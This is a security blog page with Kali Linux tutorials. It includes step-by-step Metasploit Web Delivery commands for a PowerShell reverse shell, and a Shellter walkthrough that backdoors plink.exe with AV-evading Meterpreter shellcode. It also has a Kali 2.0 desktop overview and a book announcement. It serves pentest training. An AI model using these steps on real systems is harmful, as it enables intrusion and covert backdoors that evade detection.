Easy Remote Shells with Web Delivery

•November 5, 2015 • 1 Comment

This is a sneak peak at a section of the “Web Delivery” chapter in my new Ethical Hacking book, “Intermediate Security Testing with Kali Linux 2“. The Metasploit Web Delivery module is one of the easiest ways to quickly get a remote shell from a Linux, Mac or Windows system. In the full chapter I show how to use it against all three platforms. For the preview we will only cover Windows based targets.

As always, never try to access a network or system that you do not have express written permission to do so. Accessing systems that you don’t have permission to is illegal and you could end up in jail.

Web Delivery

In this section we will learn how to  using the Web Delivery exploit module. We will be using Metasploit and our Windows 7 VM as the target.

Let’s get started!

1. From a Kali terminal, type “msfconsole”:

Metasploit Web Delivery 1
2. Now enter:

  •  use exploit/multi/script/web_delivery
  •  set lhost [Kali IP Address]
  •  set lport 4444

3. Type, “show targets”:

Metasploit Web Delivery 2

Notice we have 3 options, Python, PHP and PSH (PowerShell). We will be attacking a Windows system, so we will use PowerShell.

4. Enter, “set target 2”
5. Set the payload, “set payload windows/meterpreter/reverse_tcp”
6. You can check that everything looks okay with “show options”:

Metasploit Web Delivery 3
7. Now type, “exploit”:

Metasploit Web Delivery 4

This starts a listener server that hosts our payload and then waits for an incoming connection. All we need to do is run the generated PowerShell command on our target system.

8. On the Windows 7 system, open a command prompt and paste in and execute the PowerShell command:

Metasploit Web Delivery 5
And after a few seconds you should see:

Metasploit Web Delivery 6

A meterpreter session open!

9. Now type, “sessions” to list the active sessions
10. Connect to it with “sessions -i 1”

Metasploit Web Delivery 7

We now have a full Meterpreter shell to the target:

Metasploit Web Delivery 8
Type “exit” to quit the active session and “exit” again to exit Metasploit.

I hope you enjoyed this chapter section preview. In the full chapter, I show how Web Delivery can be set to work against Linux and Mac systems also. In addition in the Msfvenom chapter you will also see how to make standalone executable shells that don’t require the target to open a command prompt on their system and manually run the code.

For a lot more ethical hacking training and hands on tutorials, check out “Intermediate Security Testing with Kali Linux 2” available on Amazon.com.

Anti-Virus Bypass with Shellter 5.1 on Kali Linux

•October 4, 2015 • 5 Comments

Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 5.1 shellcode injection tool! The latest version of Shellter for pentesters includes a “stealth” mode that retains the functionality of the original host program.

Shellter works by taking a legit Windows .exe file, adds the shell code to it and then does a great job of modifying the file for AV bypass. The program’s automatic mode makes the whole process very pain free. In this tutorial I used Kali Linux 2.0 as the host and a Windows system as the target.

The new version of Shellter is not included in the repositories yet, so if you want the latest version you will need to download the zip file and install it manually.

So enough talk, let’s see it in action!

(Note: As always, never attempt to access a system that you do not have express written permission to do so. Doing so is illegal and you could end up in jail.)

1. Download and install “shellter” ( https://www.shellterproject.com/download/ )

I saved the extracted folder to the /root/Desktop folder. You will need to make the shellter.exe file executable with the chmod command.

2. Grab “plink.exe” from Kali’s ‘usr/share/windows-binaries’ directory and copy it into the Shellter directory.

3. Change to the ‘/root/Desktop/shellter’ directory.

4. Start Shellter – type, “wine shellter.exe”

Shellter Kali 1

5. Enter “A” for automatic

6. At the PE Target Prompt, enter “plink.exe”

7. When prompted to enable stealth mode enter “Y”:
Shellter Kali 2

This new feature allows the backdoored file to still function as originally file. A big help for Red Team pentesters.

8. When prompted for Payloads select “L” and then “1” for Meterpreter_Reverse_TCP.

9. Enter your Kali IP address for LHOST.

10. Enter a port to use (I used 4545)

Shellter Kali 3

Shellter will then add PolyMorphic code and Obfuscate the file. When done you will see:
Shellter Kali 4

You will now have a ‘plink.exe’ (the shellcoded file) and ‘plink.exe.bak’ (the original file) in the Shellter directory.

11. Now we need to start a listener service on the Kali system using the same settings from above:

  • start Metasploit (‘msfconsole’ in a terminal)
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost
  • set lport 4545
  • exploit

Shellter Kali 5

12. Copy the ‘plink.exe’ file to the Windows system:
Shellter Kali 6

13. Now, in Windows, If you run plink.exe from the command prompt:

Shellter Kali 7

It lists the help information for the file, but does not trigger the remote shell yet. But if we actually use plink to connect to another system (a Raspberry Pi) as seen below:

Shellter Kali 8

Notice we get the Raspberry Pi ssh login prompt through Plink, but we also get a remote session to the Windows box:

Shellter Kali 9

We can run “sysinfo” to view information about the computer:

Shellter Kali 10



As you can see, a backdoored file that will bypass AV can be created pretty easily. AV is great but it can’t stop everything, you need to train your company users to be vigilant when using internet sites, social media and e-mail. Avoid suspicious websites, don’t allow website popups or warnings to install anything and never open unsolicited or suspicious attachments in e-mails. If you don’t know if you should click on something, ask your IT department. A little user vigilance can go a long way at protecting your network!

If you enjoyed this tutorial, check out my new book, “Intermediate Security Testing with Kali Linux 2“.

Kali Linux 2.0 New Desktop Overview

•October 1, 2015 • Leave a Comment

Kali 2.0 Desktop 1

After ten years of evolution, Offensive Security brings us Kali 2.0! Kali 2.0 is by far the easiest to use of all the Backtrack/ Kali releases. For those used to the original Kali, the new Kali looks very different. But it is a good thing! The menus have been completely re-organized and streamlined and many of the tools are represented by helpful icons. Let’s take a look a few minutes and look at some of the new features of Kali 2.

If you purchased my “Basic Security Testing with Kali Linux” book which was written for the original version of Kali, this overview will help get you acclimated to the new desktop look quickly, all the underlying tools are pretty much the same. My new book, “Intermediate Security Testing with Kali Linux 2” is already written for Kali 2.0.

What’s new in Kali 2?

  • New user interface
  • New Menus and Categories
  • Native Ruby 2.0 for faster Metasploit loading
  • Desktop notifications
  • Built in Screencasting

Kali 2 is much more streamlined and the layout flows very well compared to earlier versions of Kali/ Backtrack. It just feels like everything is at your fingertips and laid out in a very clear and concise manner.

Desktop Overview

The new Desktop looks very good and places everything at your fingertips:

Kali 2.0 Desktop 2

Favorites Bar

The new Kali comes with a customizable “Favorites bar” on the left side of the desktop. This menu lists the most commonly used applications to get you into the action quicker:

Kali 2.0 Desktop 3

Just click on one and the represented tool is automatically started with the required dependencies. For example, clicking on the Metasploit button pre-starts the database software and checks to make sure the default database has been created before launching Metasploit.

Clicking on the “Show Applications” button on the bottom of the favorites bar reveals a lot more applications. The programs are arranged in folders by type:

Kali 2.0 Desktop 4

If you don’t see the app you want, just type in what you are looking for in the search bar.

Applications Menu

A list of common program favorites listed by categories is located under the Applications menu:

Kali 2.0 Desktop 5

The tools are laid out logically by type. For example, just click on the Web Application Analysis menu item to see the most common web app testing tools:

Kali 2.0 Desktop 6

Notice that I didn’t say “all” of the tools for a specific category would be listed. This is because the menu system only shows the top tools and not all of the tools available in Kali. In reality only a fraction of the installed tools in Kali are actually in the menu system. Most of the tools are accessible only from the command line.

Command Line Tools

The majority of tools are installed in the “/usr/share directory”:

Kali 2.0 Desktop 7
These tools (as well as tools listed in the menu) are run simply by typing their name in a terminal. Take a few moments and familiarize yourself with both the menu system and the share directory.

Auto-minimizing windows

Another thing that is new in Kali 2 is that some windows tend to auto-minimize and seem to dis-appear at times. When a window is minimized you will see a white circle to the left of the associated icon on the favorite bar. In the screenshot below, it is showing that I have two terminal windows minimized:

Kali 2.0 Desktop 8

If I click on the terminal icon once the first terminal window will appear, click twice and both minimized terminal windows re-appear:

Kali 2.0 Desktop 9

You can also hit “Alt-Tab” to show minimized windows. Keep the “Alt” key pressed and arrow around to see additional windows.


As in the earlier versions of Kali/ Backtrack you also have workspaces. If you are not familiar with workspaces, they are basically additional desktop screens that you can use. Hitting the “Super Key” (Windows Key) gives you an overview of all windows that you have open. If you have a touch screen monitor you can also grab and pull the workspaces menu open. With workspaces you are able to drag and drop running programs between the workspaces:

Kali 2.0 Desktop 10
Places Menu

The Places menu contains links to different locations in Kali:

Kali 2.0 Desktop 11


Kali 2 also has the capability to do screen casting built in. With this you can record your security testing adventures as they happen!

Kali 2.0 Desktop 12

Apache Webserver

At the time of this writing, the Service Icons to stop, start and restart Apache Web Server seem to have been removed from Kali 2. Not a problem as you can start them from a terminal prompt by using the following commands:

  • To Start – “service apache2 start” or “/etc/init.d/apache2 start”
  • To Stop – “service apache2 stop” or “/etc/init.d/apache2 stop”
  • To Restart – “service apache2 restart” or “/etc/init.d/apache2 restart”

As seen below:

Kali 2.0 Desktop 13

You can now surf to Kali’s webserver, notice the default webpage has changed from Kali 1:

Kali 2.0 Desktop 14

The root website is also one level deeper now located in a folder called HTTP:

Kali 2.0 Desktop 15
So when you use the Apache server, just drop your website pages/folders into the “/var/www/html/” directory instead of the old “/var/www/” directory.


Keeping your Kali install up to date is very important. Enter the following commands to update Kali:

  • apt-get update
  • apt-get dist-upgrade
  • reboot

Hopefully this overview will help get you up and running on Kali 2.0 quickly.

If you want to learn the basics of Ethical Hacking using the powerful Kali Platform using step-by-step hands on tutorials, check out Check out my Kali book series available on Amazon.com:

Basic Security Testing with Kali Linux

Kali 2.0 Book Cover


Intermediate Security Testing with Kali Linux 2 Released!

•September 27, 2015 • Leave a Comment

Security Series

Introducing my new book, “Intermediate Security Testing with Kali Linux 2“!

The second book in my Kali Linux series has been released. Picking up where “Basic Security Testing with Kali Linux” left off, this book delves deeper into using post exploitation techniques. It also covers Web Application testing using tools like Burp Suite. It then turns to testing smart devices like Android Phones and tablets. And even includes an entire section on using the Forensics tools in Kali to perform computer security testing.

Topics Include:

  • New Metasploit Features and Commands
  • Creating Shells with Msfvenom
  • Post Modules & Railgun
  • PowerShell for Post Exploitation
  • Web Application Pentesting
  • How to use Burp Suite
  • Security Testing Android Devices
  • Forensics Tools for Security Testing
  • Security Testing an Internet of Things (IoT) Device

And much, much more!

This book was originally written for the first version of Kali and was ready to be released last month. But as the new Kali 2.0 was released I held the book back and completely updated the entire book from beginning to end to cover the new OS and any tool changes. So in essence as it took about a year and a half to write this book, all the information in it has been updated as of this month!

If you are still using the original Kali, not a problem the tools work the same in both versions, though I do recommend updating to the new Kali 2.0 as it has a much better interface and menu system. If you are still using Backtrack, please update to Kali 2 you will thank yourself!

The second book dwarfs the first in both size and content. I took to heart all of the feedback from my first book. I had a lot of request to add more tool coverage, so I added two entire chapters covering included tools and their use. Multiple people asked me to cover the forensics tools, so I added an entire section devoted to security testing with Kali’s Forensics tools. Several people had told me that the first book was confusing in places, as I had an extra month to work on the book before publishing, hopefully this book will be easier to follow and understand than the first.

I even included a chapter on testing Internet of Things (IoT) devices. As IoT devices are becoming all the rage, security testing them is of high importance. We will have an eye opening look at an actually physical security device in use today that has some serious vulnerabilities.

As always, thank you so much for your support and encouragement. The overwhelming support I have received from individual users, technical trainers, corporations, universities, law enforcement agencies and members of the military has been both humbling and an absolute honor. Thank you!

Intermediate Security Testing with Kali 2 Linux


Get every new post delivered to your Inbox.

Join 336 other followers